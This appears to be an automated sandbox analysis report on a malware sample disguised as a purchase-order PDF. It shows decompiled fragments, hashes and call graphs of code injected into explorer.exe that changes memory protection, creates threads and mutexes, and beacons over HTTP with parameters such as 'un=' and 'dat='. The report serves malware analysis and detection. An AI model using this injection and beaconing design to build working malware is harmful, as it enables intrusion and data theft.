                                            									}
                                            									_t152 = 0xc0150005;
                                            									goto L24;
                                            								}
                                            							}
                                            							goto L11;
                                            						}
                                            					}
                                            				}
                                            				L1:
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
                                            				return _t152;
                                            			}















                                            0x00a29006
                                            0x00a29006
                                            0x00a2900b
                                            0x00a29010
                                            0x00a29015
                                            0x00a2901b
                                            0x00a2901d
                                            0x00a29026
                                            0x00a2902f
                                            0x00a29038
                                            0x00a29040
                                            0x00a29048
                                            0x00a2904f
                                            0x00a29055
                                            0x00a29069
                                            0x00a29071
                                            0x00a2907e
                                            0x00a29086
                                            0x00a2908f
                                            0x00a290a2
                                            0x00a290b7
                                            0x00a290bb
                                            0x00a290d8
                                            0x00000000
                                            0x00a290e3
                                            0x00a290fb
                                            0x00a290ff
                                            0x00000000
                                            0x00000000
                                            0x00a29107
                                            0x00a821ff
                                            0x00a821ff
                                            0x00000000
                                            0x00a821ff
                                            0x00a29114
                                            0x00a82210
                                            0x00a82216
                                            0x00a82216
                                            0x00a2911a
                                            0x00a2911a
                                            0x00a2911a
                                            0x00a29121
                                            0x00a29127
                                            0x00a2912b
                                            0x00a29132
                                            0x00a29142
                                            0x00a2914e
                                            0x00a29159
                                            0x00a2917a
                                            0x00a2917e
                                            0x00000000
                                            0x00a291a0
                                            0x00a82238
                                            0x00a82240
                                            0x00a82248
                                            0x00a8224a
                                            0x00a82252
                                            0x00000000
                                            0x00a82258
                                            0x00a82258
                                            0x00a82261
                                            0x00a82338
                                            0x00a82338
                                            0x00a8233b
                                            0x00a82343
                                            0x00a82348
                                            0x00a8234e
                                            0x00a8234e
                                            0x00a82387
                                            0x00000000
                                            0x00a82387
                                            0x00a8226f
                                            0x00a82276
                                            0x00a8227c
                                            0x00a8227f
                                            0x00a8227f
                                            0x00a8229b
                                            0x00a822a8
                                            0x00a822aa
                                            0x00a822b2
                                            0x00a8232c
                                            0x00a8232c
                                            0x00a82333
                                            0x00000000
                                            0x00a822b4
                                            0x00a822c7
                                            0x00a822c9
                                            0x00a822d1
                                            0x00000000
                                            0x00000000
                                            0x00a822d9
                                            0x00a822e2
                                            0x00a822e8
                                            0x00a822ec
                                            0x00a822f3
                                            0x00a82303
                                            0x00a8231f
                                            0x00000000
                                            0x00000000
                                            0x00a82321
                                            0x00a82326
                                            0x00a82326
                                            0x00000000
                                            0x00a82326
                                            0x00a822db
                                            0x00000000
                                            0x00a822db
                                            0x00a822b2
                                            0x00000000
                                            0x00a82252
                                            0x00a2917e
                                            0x00a290d8
                                            0x00a290bd
                                            0x00a290c2
                                            0x00a290ce

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 93dca29cb4dc1eac74377859c6557aeeccdf81bc532aefba75e8301427471cb3
                                            • Instruction ID: c1c39cbde5aff227aab3f2000db76cf763a0481a08f8609284bbc52ee81dfce3
                                            • Opcode Fuzzy Hash: 93dca29cb4dc1eac74377859c6557aeeccdf81bc532aefba75e8301427471cb3
                                            • Instruction Fuzzy Hash: 5D8109B1D002799BDB25DF54CD45BEEB6B8AF48710F0041EAE919B7280E7709E85CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:2.4%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:4.6%
                                            Total number of Nodes:457
                                            Total number of Limit Nodes:17
                                            execution_graph 13904 113930b9 13905 113930ed 13904->13905 13907 113931f0 13904->13907 13906 11396f82 6 API calls 13905->13906 13905->13907 13906->13907 13759 11396f7a 13760 11396fb8 13759->13760 13761 113935b2 socket 13760->13761 13763 11397081 13760->13763 13769 11397022 13760->13769 13761->13763 13762 11397134 13764 11393732 connect 13762->13764 13766 113971b2 13762->13766 13762->13769 13763->13762 13765 11397117 getaddrinfo 13763->13765 13763->13769 13764->13766 13765->13762 13767 113936b2 send 13766->13767 13766->13769 13768 11397729 13767->13768 13768->13769 13770 113977f4 setsockopt recv 13768->13770 13770->13769 13857 1139583a 13858 11395841 13857->13858 13859 11396f82 6 API calls 13858->13859 13861 113958c5 13859->13861 13860 11395906 13861->13860 13862 11396232 NtCreateFile 13861->13862 13862->13860 13920 1138f0fb 13922 1138f137 13920->13922 13921 1138f2d5 13922->13921 13923 1138b8f2 NtProtectVirtualMemory 13922->13923 13924 1138f28a 13923->13924 13925 1138b8f2 NtProtectVirtualMemory 13924->13925 13928 1138f2a9 13925->13928 13926 1138f2cd 13927 11392382 2 API calls 13926->13927 13927->13921 13928->13926 13929 1138b8f2 NtProtectVirtualMemory 13928->13929 13929->13926 13771 1139237e 13772 113923c7 13771->13772 13773 11392232 ObtainUserAgentString 13772->13773 13774 11392438 13773->13774 13775 11393632 WSAStartup 13774->13775 13776 11392e7b 13775->13776 13797 1138efbf 13799 1138f016 13797->13799 13798 1138f0f0 13799->13798 13802 1138b8f2 NtProtectVirtualMemory 13799->13802 13803 1138f0bb 13799->13803 13800 1138f0e8 13801 11392382 2 API calls 13800->13801 13801->13798 13802->13803 13803->13800 13804 1138b8f2 NtProtectVirtualMemory 13803->13804 13804->13800 13908 113918be 13910 113918c3 13908->13910 13909 113919a6 13910->13909 13911 11391995 ObtainUserAgentString 13910->13911 13911->13909 13826 113989f1 13827 113989f7 13826->13827 13830 1138d852 13827->13830 13829 11398a0f 13831 1138d8e4 13830->13831 13832 1138d865 13830->13832 13831->13829 13832->13831 13834 1138d887 13832->13834 13836 1138d87e 13832->13836 13833 1139336f 13833->13829 13834->13831 13838 11391662 13834->13838 13836->13833 13837 113930c2 6 API calls 13836->13837 13837->13833 13839 1139166b 13838->13839 13847 113917ba 13838->13847 13840 1138b0f2 6 API calls 13839->13840 13839->13847 13842 113916ee 13840->13842 13841 11391750 13844 1139183f 13841->13844 13846 11391791 13841->13846 13841->13847 13842->13841 13843 11396f82 6 API calls 13842->13843 13843->13841 13845 11396f82 6 API calls 13844->13845 13844->13847 13845->13847 13846->13847 13848 11396f82 6 API calls 13846->13848 13847->13831 13848->13847 13849 1138c5f1 13850 1138c60e 13849->13850 13851 1138c606 13849->13851 13852 11391662 6 API calls 13851->13852 13852->13850 13930 1138b0f1 13931 1138b109 13930->13931 13932 1138b1d3 13930->13932 13933 1138b012 6 API calls 13931->13933 13934 1138b113 13933->13934 13934->13932 13935 11396f82 6 API calls 13934->13935 13935->13932 13805 113989b3 13806 113989bd 13805->13806 13809 1138d6d2 13806->13809 13808 113989e0 13810 1138d704 13809->13810 13811 1138d6f7 13809->13811 13813 1138d6ff 13810->13813 13814 1138d72d 13810->13814 13816 1138d737 13810->13816 13812 1138b0f2 6 API calls 13811->13812 13812->13813 13813->13808 13818 113932c2 13814->13818 13816->13813 13817 11396f82 6 API calls 13816->13817 13817->13813 13819 113932cb 13818->13819 13820 113932df 13818->13820 13819->13820 13822 113930c2 13819->13822 13820->13813 13823 113930cb 13822->13823 13825 113931f0 13822->13825 13824 11396f82 6 API calls 13823->13824 13823->13825 13824->13825 13825->13820 13744 11396232 13746 1139625c 13744->13746 13747 11396334 13744->13747 13745 11396410 NtCreateFile 13745->13747 13746->13745 13746->13747 13936 1138f2f4 13938 1138f349 13936->13938 13937 1138f4c3 13944 1138b8f2 NtProtectVirtualMemory 13937->13944 13945 1138f597 13937->13945 13939 1138f49f 13938->13939 13941 1138b8f2 NtProtectVirtualMemory 13938->13941 13939->13937 13940 1138b8f2 NtProtectVirtualMemory 13939->13940 13940->13937 13942 1138f480 13941->13942 13943 1138b8f2 NtProtectVirtualMemory 13942->13943 13943->13939 13944->13945 13946 1138b8f2 NtProtectVirtualMemory 13945->13946 13949 1138f5bf 13945->13949 13946->13949 13947 1138f6e1 13948 11392382 2 API calls 13947->13948 13950 1138f6e9 13948->13950 13951 1138b8f2 NtProtectVirtualMemory 13949->13951 13952 1138f6b9 13949->13952 13951->13952 13952->13947 13953 1138b8f2 NtProtectVirtualMemory 13952->13953 13953->13947 13912 11398aa9 13913 11398aaf 13912->13913 13916 11393212 13913->13916 13915 11398ac7 13917 1139321b 13916->13917 13918 11393237 13916->13918 13917->13918 13919 113930c2 6 API calls 13917->13919 13918->13915 13919->13918 13863 1139222a 13864 1139225e 13863->13864 13865 113918c2 ObtainUserAgentString 13864->13865 13866 1139226b 13865->13866 13485 11397bac 13486 11397bb1 13485->13486 13519 11397bb6 13486->13519 13520 1138db72 13486->13520 13488 11397c2c 13489 11397c85 13488->13489 13490 11397c69 13488->13490 13491 11397c54 13488->13491 13488->13519 13492 11395ab2 NtProtectVirtualMemory 13489->13492 13494 11397c6e 13490->13494 13495 11397c80 13490->13495 13493 11395ab2 NtProtectVirtualMemory 13491->13493 13496 11397c8d 13492->13496 13498 11397c5c 13493->13498 13499 11395ab2 NtProtectVirtualMemory 13494->13499 13495->13489 13500 11397c97 13495->13500 13556 1138f102 13496->13556 13542 1138eee2 13498->13542 13502 11397c76 13499->13502 13504 11397cbe 13500->13504 13505 11397c9c 13500->13505 13548 1138efc2 13502->13548 13506 11397cd9 13504->13506 13507 11397cc7 13504->13507 13504->13519 13524 11395ab2 13505->13524 13511 11395ab2 NtProtectVirtualMemory 13506->13511 13506->13519 13509 11395ab2 NtProtectVirtualMemory 13507->13509 13510 11397ccf 13509->13510 13566 1138f2f2 13510->13566 13514 11397ce5 13511->13514 13584 1138f712 13514->13584 13522 1138db93 13520->13522 13521 1138dcce 13521->13488 13522->13521 13523 1138dcb5 CreateMutexW 13522->13523 13523->13521 13525 11395adf 13524->13525 13526 11395ebc 13525->13526 13596 1138b8f2 13525->13596 13534 1138ede2 13526->13534 13528 11395e5c 13529 1138b8f2 NtProtectVirtualMemory 13528->13529 13530 11395e7c 13529->13530 13531 1138b8f2 NtProtectVirtualMemory 13530->13531 13532 11395e9c 13531->13532 13533 1138b8f2 NtProtectVirtualMemory 13532->13533 13533->13526 13535 1138edf0 13534->13535 13537 1138eecd 13535->13537 13621 11392382 13535->13621 13538 1138b412 13537->13538 13539 1138b440 13538->13539 13540 1138b473 13539->13540 13541 1138b44d CreateThread 13539->13541 13540->13519 13541->13519 13544 1138ef06 13542->13544 13543 1138efa4 13543->13519 13544->13543 13545 1138b8f2 NtProtectVirtualMemory 13544->13545 13546 1138ef9c 13545->13546 13547 11392382 2 API calls 13546->13547 13547->13543 13550 1138f016 13548->13550 13549 1138f0f0 13549->13519 13550->13549 13553 1138b8f2 NtProtectVirtualMemory 13550->13553 13554 1138f0bb 13550->13554 13551 1138f0e8 13552 11392382 2 API calls 13551->13552 13552->13549 13553->13554 13554->13551 13555 1138b8f2 NtProtectVirtualMemory 13554->13555 13555->13551 13558 1138f137 13556->13558 13557 1138f2d5 13557->13519 13558->13557 13559 1138b8f2 NtProtectVirtualMemory 13558->13559 13560 1138f28a 13559->13560 13561 1138b8f2 NtProtectVirtualMemory 13560->13561 13563 1138f2a9 13561->13563 13562 1138f2cd 13564 11392382 2 API calls 13562->13564 13563->13562 13565 1138b8f2 NtProtectVirtualMemory 13563->13565 13564->13557 13565->13562 13567 1138f349 13566->13567 13568 1138f49f 13567->13568 13570 1138b8f2 NtProtectVirtualMemory 13567->13570 13569 1138b8f2 NtProtectVirtualMemory 13568->13569 13573 1138f4c3 13568->13573 13569->13573 13571 1138f480 13570->13571 13572 1138b8f2 NtProtectVirtualMemory 13571->13572 13572->13568 13574 1138b8f2 NtProtectVirtualMemory 13573->13574 13575 1138f597 13573->13575 13574->13575 13576 1138b8f2 NtProtectVirtualMemory 13575->13576 13579 1138f5bf 13575->13579 13576->13579 13577 1138f6e1 13578 11392382 2 API calls 13577->13578 13580 1138f6e9 13578->13580 13581 1138b8f2 NtProtectVirtualMemory 13579->13581 13582 1138f6b9 13579->13582 13580->13519 13581->13582 13582->13577 13583 1138b8f2 NtProtectVirtualMemory 13582->13583 13583->13577 13585 1138f767 13584->13585 13586 1138b8f2 NtProtectVirtualMemory 13585->13586 13587 1138f903 13585->13587 13588 1138f8e3 13586->13588 13593 1138b8f2 NtProtectVirtualMemory 13587->13593 13594 1138f992 13587->13594 13589 1138b8f2 NtProtectVirtualMemory 13588->13589 13589->13587 13590 1138f9b7 13591 11392382 2 API calls 13590->13591 13592 1138f9bf 13591->13592 13592->13519 13593->13594 13594->13590 13595 1138b8f2 NtProtectVirtualMemory 13594->13595 13595->13590 13597 1138b987 13596->13597 13600 1138b9b2 13597->13600 13611 1138c622 13597->13611 13599 1138bc0c 13599->13528 13600->13599 13601 1138bba2 13600->13601 13603 1138bac5 13600->13603 13602 11397e12 NtProtectVirtualMemory 13601->13602 13610 1138bb5b 13602->13610 13615 11397e12 13603->13615 13605 11397e12 NtProtectVirtualMemory 13605->13599 13606 1138bae3 13606->13599 13607 1138bb3d 13606->13607 13608 11397e12 NtProtectVirtualMemory 13606->13608 13609 11397e12 NtProtectVirtualMemory 13607->13609 13608->13607 13609->13610 13610->13599 13610->13605 13612 1138c67a 13611->13612 13613 1138c67e 13612->13613 13614 11397e12 NtProtectVirtualMemory 13612->13614 13613->13600 13614->13612 13619 11396942 13615->13619 13617 11397e45 NtProtectVirtualMemory 13618 11397e70 13617->13618 13618->13606 13620 11396967 13619->13620 13620->13617 13622 113923c7 13621->13622 13627 11392232 13622->13627 13624 11392438 13631 11393632 13624->13631 13626 11392e7b 13626->13537 13628 1139225e 13627->13628 13634 113918c2 13628->13634 13630 1139226b 13630->13624 13632 1139368b WSAStartup 13631->13632 13633 1139366d 13631->13633 13632->13626 13633->13632 13635 11391934 13634->13635 13636 113919a6 13635->13636 13637 11391995 ObtainUserAgentString 13635->13637 13636->13630 13637->13636 13867 1139362c 13868 1139368b WSAStartup 13867->13868 13869 1139366d 13867->13869 13869->13868 13870 1138c42e 13871 1138c45b 13870->13871 13879 1138c4c9 13870->13879 13872 11396232 NtCreateFile 13871->13872 13871->13879 13873 1138c496 13872->13873 13874 1138c4c5 13873->13874 13876 1138c082 NtCreateFile 13873->13876 13875 11396232 NtCreateFile 13874->13875 13874->13879 13875->13879 13877 1138c4b6 13876->13877 13877->13874 13878 1138bf52 NtCreateFile 13877->13878 13878->13874 13756 1139372e 13757 11393788 connect 13756->13757 13758 1139376a 13756->13758 13758->13757 13954 11390ce2 13956 11390dd9 13954->13956 13955 11391022 13956->13955 13960 11390352 13956->13960 13958 11390f0d 13958->13955 13969 11390792 13958->13969 13961 1139039e 13960->13961 13962 11390595 13961->13962 13963 113904ec 13961->13963 13968 1139058e 13961->13968 13965 11396232 NtCreateFile 13962->13965 13962->13968 13964 11396232 NtCreateFile 13963->13964 13966 113904ff 13964->13966 13965->13968 13967 11396232 NtCreateFile 13966->13967 13966->13968 13967->13968 13968->13958 13970 113907e0 13969->13970 13971 11396232 NtCreateFile 13970->13971 13973 1139090c 13971->13973 13972 11390af3 13972->13958 13973->13972 13974 11390352 NtCreateFile 13973->13974 13975 11390602 NtCreateFile 13973->13975 13974->13973 13975->13973 13976 113932e4 13977 1139336f 13976->13977 13978 11393305 13976->13978 13978->13977 13979 113930c2 6 API calls 13978->13979 13979->13977 13777 1138db66 13778 1138db6a 13777->13778 13779 1138dcb5 CreateMutexW 13778->13779 13780 1138dcce 13778->13780 13779->13780 13853 1138edd9 13854 1138edf0 13853->13854 13855 11392382 2 API calls 13854->13855 13856 1138eecd 13854->13856 13855->13856 13638 1138b2dd 13642 1138b31a 13638->13642 13639 1138b3fa 13640 1138b328 SleepEx 13640->13640 13640->13642 13642->13639 13642->13640 13645 11395f12 13642->13645 13654 1138c432 13642->13654 13664 1138b0f2 13642->13664 13648 11395f48 13645->13648 13646 11396134 13646->13642 13647 113960e9 13650 11396125 13647->13650 13682 11395842 13647->13682 13648->13646 13648->13647 13652 11396232 NtCreateFile 13648->13652 13670 11396f82 13648->13670 13690 11395922 13650->13690 13652->13648 13655 1138c45b 13654->13655 13663 1138c4c9 13654->13663 13656 11396232 NtCreateFile 13655->13656 13655->13663 13657 1138c496 13656->13657 13658 1138c4c5 13657->13658 13711 1138c082 13657->13711 13659 11396232 NtCreateFile 13658->13659 13658->13663 13659->13663 13661 1138c4b6 13661->13658 13720 1138bf52 13661->13720 13663->13642 13665 1138b109 13664->13665 13666 1138b1d3 13664->13666 13725 1138b012 13665->13725 13666->13642 13668 1138b113 13668->13666 13669 11396f82 6 API calls 13668->13669 13669->13666 13672 11396fb8 13670->13672 13671 11397022 13671->13648 13672->13671 13675 11397081 13672->13675 13698 113935b2 13672->13698 13674 11397134 13674->13671 13679 113971b2 13674->13679 13701 11393732 13674->13701 13675->13671 13675->13674 13677 11397117 getaddrinfo 13675->13677 13677->13674 13679->13671 13704 113936b2 13679->13704 13680 11397729 13680->13671 13681 113977f4 setsockopt recv 13680->13681 13681->13671 13683 1139586d 13682->13683 13707 11396232 13683->13707 13685 11395906 13685->13647 13686 11395888 13686->13685 13687 11396f82 6 API calls 13686->13687 13688 113958c5 13686->13688 13687->13688 13688->13685 13689 11396232 NtCreateFile 13688->13689 13689->13685 13691 113959c2 13690->13691 13692 11396232 NtCreateFile 13691->13692 13694 113959d6 13692->13694 13693 11395a9f 13693->13646 13694->13693 13695 11395a5d 13694->13695 13697 11396f82 6 API calls 13694->13697 13695->13693 13696 11396232 NtCreateFile 13695->13696 13696->13693 13697->13695 13699 1139360a socket 13698->13699 13700 113935ec 13698->13700 13699->13675 13700->13699 13702 11393788 connect 13701->13702 13703 1139376a 13701->13703 13702->13679 13703->13702 13705 11393705 send 13704->13705 13706 113936e7 13704->13706 13705->13680 13706->13705 13709 1139625c 13707->13709 13710 11396334 13707->13710 13708 11396410 NtCreateFile 13708->13710 13709->13708 13709->13710 13710->13686 13712 1138c420 13711->13712 13713 1138c0aa 13711->13713 13712->13661 13713->13712 13714 11396232 NtCreateFile 13713->13714 13716 1138c1f9 13714->13716 13715 1138c3df 13715->13661 13716->13715 13717 11396232 NtCreateFile 13716->13717 13718 1138c3c9 13717->13718 13719 11396232 NtCreateFile 13718->13719 13719->13715 13721 1138bf70 13720->13721 13722 1138bf84 13720->13722 13721->13658 13723 11396232 NtCreateFile 13722->13723 13724 1138c046 13723->13724 13724->13658 13727 1138b031 13725->13727 13726 1138b0cd 13726->13668 13727->13726 13728 11396f82 6 API calls 13727->13728 13728->13726 13980 1138eedd 13982 1138ef06 13980->13982 13981 1138efa4 13982->13981 13983 1138b8f2 NtProtectVirtualMemory 13982->13983 13984 1138ef9c 13983->13984 13985 11392382 2 API calls 13984->13985 13985->13981 13880 11398a1f 13881 11398a25 13880->13881 13884 1138c5f2 13881->13884 13883 11398a3d 13885 1138c5fb 13884->13885 13886 1138c60e 13884->13886 13885->13886 13887 11391662 6 API calls 13885->13887 13886->13883 13887->13886 13748 11397e12 13749 11396942 13748->13749 13750 11397e45 NtProtectVirtualMemory 13749->13750 13751 11397e70 13750->13751 13888 1138c613 13890 1138c620 13888->13890 13889 1138c67e 13890->13889 13891 11397e12 NtProtectVirtualMemory 13890->13891 13891->13890 13986 11390cd4 13988 11390cd8 13986->13988 13987 11391022 13988->13987 13989 11390352 NtCreateFile 13988->13989 13990 11390f0d 13989->13990 13990->13987 13991 11390792 NtCreateFile 13990->13991 13991->13990 13781 1139014a 13782 11390153 13781->13782 13786 11390174 13781->13786 13784 11392382 2 API calls 13782->13784 13783 113901e7 13785 1139016c 13784->13785 13787 1138b0f2 6 API calls 13785->13787 13786->13783 13789 1138b1f2 13786->13789 13787->13786 13790 1138b20f 13789->13790 13794 1138b2c9 13789->13794 13791 11395f12 7 API calls 13790->13791 13793 1138b242 13790->13793 13791->13793 13792 1138b289 13792->13794 13796 1138b0f2 6 API calls 13792->13796 13793->13792 13795 1138c432 NtCreateFile 13793->13795 13794->13786 13795->13792 13796->13794 13892 11397e0a 13893 11397e45 NtProtectVirtualMemory 13892->13893 13894 11396942 13892->13894 13895 11397e70 13893->13895 13894->13893 13896 11398a4d 13897 11398a53 13896->13897 13900 1138c782 13897->13900 13899 11398a6b 13902 1138c78f 13900->13902 13901 1138c7ad 13901->13899 13902->13901 13903 11391662 6 API calls 13902->13903 13903->13901 13729 11396f82 13731 11396fb8 13729->13731 13730 11397022 13731->13730 13732 113935b2 socket 13731->13732 13734 11397081 13731->13734 13732->13734 13733 11397134 13733->13730 13735 11393732 connect 13733->13735 13738 113971b2 13733->13738 13734->13730 13734->13733 13736 11397117 getaddrinfo 13734->13736 13735->13738 13736->13733 13737 113936b2 send 13739 11397729 13737->13739 13738->13730 13738->13737 13739->13730 13740 113977f4 setsockopt recv 13739->13740 13740->13730

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 11396f82-11396fb6 1 11396fb8-11396fbc 0->1 2 11396fd6-11396fd9 0->2 1->2 3 11396fbe-11396fc2 1->3 4 11396fdf-11396fed 2->4 5 113978fe-1139790c 2->5 3->2 6 11396fc4-11396fc8 3->6 7 11396ff3-11396ff7 4->7 8 113978f6-113978f7 4->8 6->2 9 11396fca-11396fce 6->9 10 11396ff9-11396ffd 7->10 11 11396fff-11397000 7->11 8->5 9->2 12 11396fd0-11396fd4 9->12 10->11 13 1139700a-11397010 10->13 11->13 12->2 12->4 14 1139703a-11397060 13->14 15 11397012-11397020 13->15 16 11397068-1139707c call 113935b2 14->16 17 11397062-11397066 14->17 15->14 18 11397022-11397026 15->18 22 11397081-113970a2 16->22 17->16 20 113970a8-113970ab 17->20 18->8 19 1139702c-11397035 18->19 19->8 23 113970b1-113970b8 20->23 24 11397144-11397150 20->24 22->20 25 113978ee-113978ef 22->25 27 113970ba-113970dc call 11396942 23->27 28 113970e2-113970f5 23->28 24->25 26 11397156-11397165 24->26 25->8 29 1139717f-1139718f 26->29 30 11397167-11397178 call 11393552 26->30 27->28 28->25 32 113970fb-11397101 28->32 34 11397191-113971ad call 11393732 29->34 35 113971e5-1139721b 29->35 30->29 32->25 37 11397107-11397109 32->37 43 113971b2-113971da 34->43 40 1139722d-11397231 35->40 41 1139721d-1139722b 35->41 37->25 42 1139710f-11397111 37->42 45 11397233-11397245 40->45 46 11397247-1139724b 40->46 44 1139727f-11397280 41->44 42->25 47 11397117-11397132 getaddrinfo 42->47 43->35 52 113971dc-113971e1 43->52 51 11397283-113972e0 call 11397d62 call 11394482 call 11393e72 call 11398002 44->51 45->44 48 1139724d-1139725f 46->48 49 11397261-11397265 46->49 47->24 50 11397134-1139713c 47->50 48->44 53 1139726d-11397279 49->53 54 11397267-1139726b 49->54 50->24 63 113972e2-113972e6 51->63 64 113972f4-11397354 call 11397d92 51->64 52->35 53->44 54->51 54->53 63->64 66 113972e8-113972ef call 11394042 63->66 69 1139735a-11397396 call 11397d62 call 11398262 call 11398002 64->69 70 1139748c-113974b8 call 11397d62 call 11398262 64->70 66->64 85 11397398-113973b7 call 11398262 call 11398002 69->85 86 113973bb-113973e9 call 11398262 * 2 69->86 79 113974d9-11397590 call 11398262 * 3 call 11398002 * 2 call 11394482 70->79 80 113974ba-113974d5 70->80 112 11397595-113975b9 call 11398262 79->112 80->79 85->86 101 113973eb-11397410 call 11398002 call 11398262 86->101 102 11397415-1139741d 86->102 101->102 105 1139741f-11397425 102->105 106 11397442-11397448 102->106 109 11397467-11397487 call 11398262 105->109 110 11397427-1139743d 105->110 111 1139744e-11397456 106->111 106->112 109->112 110->112 111->112 117 1139745c-1139745d 111->117 121 113975bb-113975cc call 11398262 call 11398002 112->121 122 113975d1-113976ad call 11398262 * 7 call 11398002 call 11397d62 call 11398002 call 11393e72 call 11394042 112->122 117->109 132 113976af-113976b3 121->132 122->132 135 113976ff-1139772d call 113936b2 132->135 136 113976b5-113976fa call 11393382 call 113937b2 132->136 143 1139775d-11397761 135->143 144 1139772f-11397735 135->144 158 113978e6-113978e7 136->158 148 1139790d-11397913 143->148 149 11397767-1139776b 143->149 144->143 147 11397737-1139774c 144->147 147->143 152 1139774e-11397754 147->152 153 11397779-11397784 148->153 154 11397919-11397920 148->154 155 113978aa-113978df call 113937b2 149->155 156 11397771-11397773 149->156 152->143 159 11397756 152->159 160 11397786-11397793 153->160 161 11397795-11397796 153->161 154->160 155->158 156->153 156->155 158->25 159->143 160->161 164 1139779c-113977a0 160->164 161->164 167 113977b1-113977b2 164->167 168 113977a2-113977af 164->168 170 113977b8-113977c4 167->170 168->167 168->170 173 113977f4-11397861 setsockopt recv 170->173 174 113977c6-113977ef call 11397d92 call 11397d62 170->174 177 113978a3-113978a4 173->177 178 11397863 173->178 174->173 177->155 178->177 181 11397865-1139786a 178->181 181->177 184 1139786c-11397872 181->184 184->177 186 11397874-113978a1 184->186 186->177 186->178
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction ID: e6ccd062a0bf12921b2dd93ef48a9735fceeae7401aa093faf47ca2224fe1886
                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction Fuzzy Hash: 38527E35618A4D8FD71AEF68C4847E9B7E1FB54308F50466EC49FC728AEE30A549CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 309 11396232-11396256 310 113968bd-113968cd 309->310 311 1139625c-11396260 309->311 311->310 312 11396266-113962a0 311->312 313 113962bf 312->313 314 113962a2-113962a6 312->314 316 113962c6 313->316 314->313 315 113962a8-113962ac 314->315 317 113962ae-113962b2 315->317 318 113962b4-113962b8 315->318 319 113962cb-113962cf 316->319 317->316 318->319 320 113962ba-113962bd 318->320 321 113962f9-1139630b 319->321 322 113962d1-113962f7 call 11396942 319->322 320->319 326 11396378 321->326 327 1139630d-11396332 321->327 322->321 322->326 330 1139637a-113963a0 326->330 328 113963a1-113963a8 327->328 329 11396334-1139633b 327->329 333 113963aa-113963d3 call 11396942 328->333 334 113963d5-113963dc 328->334 331 1139633d-11396360 call 11396942 329->331 332 11396366-11396370 329->332 331->332 332->326 338 11396372-11396373 332->338 333->326 333->334 335 113963de-1139640a call 11396942 334->335 336 11396410-11396458 NtCreateFile call 11396172 334->336 335->326 335->336 345 1139645d-1139645f 336->345 338->326 345->326 346 11396465-1139646d 345->346 346->326 347 11396473-11396476 346->347 348 11396478-11396481 347->348 349 11396486-1139648d 347->349 348->330 350 1139648f-113964b8 call 11396942 349->350 351 113964c2-113964ec 349->351 350->326 358 113964be-113964bf 350->358 356 113968ae-113968b8 351->356 357 113964f2-113964f5 351->357 356->326 359 113964fb-113964fe 357->359 360 11396604-11396611 357->360 358->351 361 1139655e-11396561 359->361 362 11396500-11396507 359->362 360->330 367 11396567-11396572 361->367 368 11396616-11396619 361->368 364 11396509-11396532 call 11396942 362->364 365 11396538-11396559 362->365 364->326 364->365 372 113965e9-113965fa 365->372 373 113965a3-113965a6 367->373 374 11396574-1139659d call 11396942 367->374 370 113966b8-113966bb 368->370 371 1139661f-11396626 368->371 376 11396739-1139673c 370->376 377 113966bd-113966c4 370->377 379 11396628-11396651 call 11396942 371->379 380 11396657-1139666b call 11397e92 371->380 372->360 373->326 375 113965ac-113965b6 373->375 374->326 374->373 375->326 382 113965bc-113965e6 375->382 386 11396742-11396749 376->386 387 113967c4-113967c7 376->387 383 113966f5-11396734 377->383 384 113966c6-113966ef call 11396942 377->384 379->326 379->380 380->326 401 11396671-113966b3 380->401 382->372 407 11396894-113968a9 383->407 384->356 384->383 393 1139674b-11396774 call 11396942 386->393 394 1139677a-113967bf 386->394 387->326 390 113967cd-113967d4 387->390 396 113967fc-11396803 390->396 397 113967d6-113967f6 call 11396942 390->397 393->356 393->394 394->407 405 1139682b-11396835 396->405 406 11396805-11396825 call 11396942 396->406 397->396 401->330 405->356 411 11396837-1139683e 405->411 406->405 407->330 411->356 414 11396840-11396886 411->414 414->407
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3619293935.0000000011330000.00000040.80000000.00040000.00000000.sdmp, Offset: 11330000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_11330000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction ID: e2c10cbee883282854f1e94ba0750c0159ebb352603c05093dbce2d44fc7a1b8
                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction Fuzzy Hash: 14224AB0A19A0E9FDB49DF28C4946AAF7F1FB98309F40432EE45ED7254DB30A451DB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 453 11397e12-11397e6e call 11396942 NtProtectVirtualMemory 456 11397e7d-11397e8f 453->456 457 11397e70-11397e7c 453->457
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 11397E67
